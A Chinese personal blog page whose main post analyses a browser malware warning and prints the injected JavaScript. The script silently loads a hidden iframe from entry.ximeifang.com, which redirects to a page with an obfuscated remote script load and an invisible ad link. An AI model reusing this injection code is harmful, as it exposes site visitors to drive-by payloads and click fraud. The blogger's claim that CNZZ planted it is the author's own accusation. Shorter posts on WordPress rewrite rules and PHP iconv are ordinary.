预览模式: 普通 | 列表

ximeifang 恶意软件病毒揭秘

困扰了很多天的ximeifang.com恶意软件病毒问题终于搞清楚了,从开始怀疑cnzz到后来怀疑联通dns劫持,到现在确认是cnzz自己放的木马,过程还真是曲折。。。
木马表现:chrome浏览器下会提示
您要访问的网站包含恶意软件

攻击者可能会试图通过 entry.ximeifang.com 在您的计算机上安装危险程序,以窃取或删除您的信息(如照片、密码、通讯内容和信用卡信息)
 
木马来源:CNZZ官方。。。震惊。。。
代码如下:
http://c.cnzz.com/core.php?web_id=统计id&show=pic1&t=z
JavaScript代码
  1. var u = "http://c.cnzz.com/core.php?web_id=统计ID&show=pic1&t=z";  
  2. var wapp = 0.95;  
  3. var pcp = 0.95;  
  4. var serh = "entry.ximeifang.com:31002";  
  5. window.onerror = function(a, b, c) {  
  6.     return true;  
  7. };  
  8. function IsPC() {  
  9.     var a = navigator.userAgent;  
  10.     var b = ["Android""iPhone""SymbianOS""Windows Phone""iPad""iPod"];  
  11.     var c = true;  
  12.     for (var v = 0; v < b.length; v++) {  
  13.         if (a.indexOf(b[v]) > 0) {  
  14.             c = false;  
  15.             break  
  16.         }  
  17.     }  
  18.     return c;  
  19. };  
  20. function loadjs(a) {  
  21.     var c = document.createElement("script");  
  22.     c.setAttribute("type""text/javascript");  
  23.     c.setAttribute("src", a);  
  24.     c.setAttribute("charset""utf-8");  
  25.     document.getElementsByTagName("head")[0].appendChild(c);  
  26. };  
  27. function loadiframe(a) {  
  28.     var c = document.createElement("iframe");  
  29.     c.setAttribute("id""wbifr");  
  30.     c.setAttribute("name""wbifr");  
  31.     c.setAttribute("width""1px");  
  32.     c.setAttribute("height""1px");  
  33.     c.setAttribute("src", a);  
  34.     document.getElementsByTagName("head")[0].appendChild(c);  
  35. };  
  36. if (IsPC()) {  
  37.     if (Math.random() < pcp) {  
  38.         loadiframe("http://" + serh + "/fakepc");  
  39.     }  
  40. else {  
  41.     if (Math.random() < wapp) {  
  42.         loadiframe("http://" + serh + "/fakewap");  
  43.     }  
  44. }  
  45. if (u.indexOf("?") > 0) {  
  46.     u += "&aaa_flag=1"  
  47. else {  
  48.     u += "?aaa_flag=1"  
  49. }  
  50. loadjs(u);  
访问fakepc则会跳转到:
http://niujv.com/
该网页源码:
XML/HTML代码
  1. <!DOCTYPE html>  
  2. <html>  
  3. <head>  
  4. <body>  
  5. <script>  
  6. <!--  
  7. document.write(unescape("%3Cscript%20src%3D%22http%3A//code1.168wss.com/page/%3Fs%3D11636%22%3E%3C/script%3E"));  
  8. //-->  
  9. </script>  
  10. <img src="fr fc_9 mar.png" />  
  11. <a href="http://www.niwodai.com/event.mhtml?artId=1823227138797576&f&utm_source=baidutz&utm_medium=cpc&cid=sem-bd03-test-dylc-380&nwd_ext_aid=3000001481188029&source_id=" target="_blank" style="width: 0px;  height: 0px; position: absolute; top: 0px; left: 0px; background:  #b2b2b2; filter:alpha(opacity=10); -moz-opacity:0.1; -khtml-opacity:  0.1; opacity: 0.1;"></a>  
  12. <span style="display:none"><script src="https://s95.cnzz.com/z_stat.php?id=1261561746&web_id=1261561746" language="JavaScript"></script></span>  
  13. <head>  
  14. </body>  
  15. </html>  
又被嵌入了一层js。。。具体要干啥我也懒得分析了,反正不会是好事。。。
 
至此算是真相大白了,CNZZ的客服还说换https就不会被DNS劫持了。。。。
 
国内最大的流量统计服务商北京锐讯灵通科技有限公司。。。。

 

Tags: DNS劫持 木马

分类:随笔杂记 | 固定链接 | 评论: 4 | 引用: 0 | 查看次数: 2880

entry.ximeifang.com恶意软件病毒DNS劫持

Google chrome浏览器访问很多网站会提示恶意软件。所有出现提示的网站的共同特点是添加了cnzz的统计代码,本来怀疑是cnzz自己搞的,后来发现他们官网都有。。。最终确认是联通DNS劫持,这么多年了还是狗改不了吃屎,不过也可能是他们被黑了。。。

最新爆料:经过仔细分析,确认是CNZZ自己搞的,具体什么目的暂时还不清楚,但肯定是有黑幕!!!

请看我的分析:https://blog.guanjianci.net/article.asp?id=814

查看更多...

Tags: DNS劫持

分类:随笔杂记 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 2261

Wordpress - IIS伪静态规则

这是适用于IIS7及以上的Wordpress的伪静态规则,保存成web.config文件,放到网站根目录即可。
<?xml version="1.0" encoding="UTF-8"?>
    <configuration>
        <system.webServer>
            <rewrite>
                <rules>
                    <rule name="WordPress" stopProcessing="true">
                        <match url="^(.*)$" />
                        <conditions>
                            <add input="{REQUEST_FILENAME}" matchType="IsFile" negate="true" />
                            <add input="{REQUEST_FILENAME}" matchType="IsDirectory" negate="true" />
                        </conditions>
                        <action type="Rewrite" url="index.php" appendQueryString="true" />
                    </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>

Tags: wordpress php

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 699

PHP通过iconv将字符串从GBK转换为UTF8编码

iconv函数可以将一种已知的字符集文件转换成另一种已知的字符集文件。例如:从GB2312转换为UTF-8。 

iconv函数在php5中内置,GB字符集默认打开。 
 
iconv在转换字符”—”到gb2312时会出错,解决方法是在需要转成的编码后加 “//IGNORE”,也就是iconv函数第二个参数后.如下: 
iconv("UTF-8", "GB2312//IGNORE", $data) ;
ignore的意思是忽略转换时的错误,如果没有ignore参数,所有该字符后面的字符串都无法被保存。

Tags: php

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 672

 广告位

↑返回顶部↑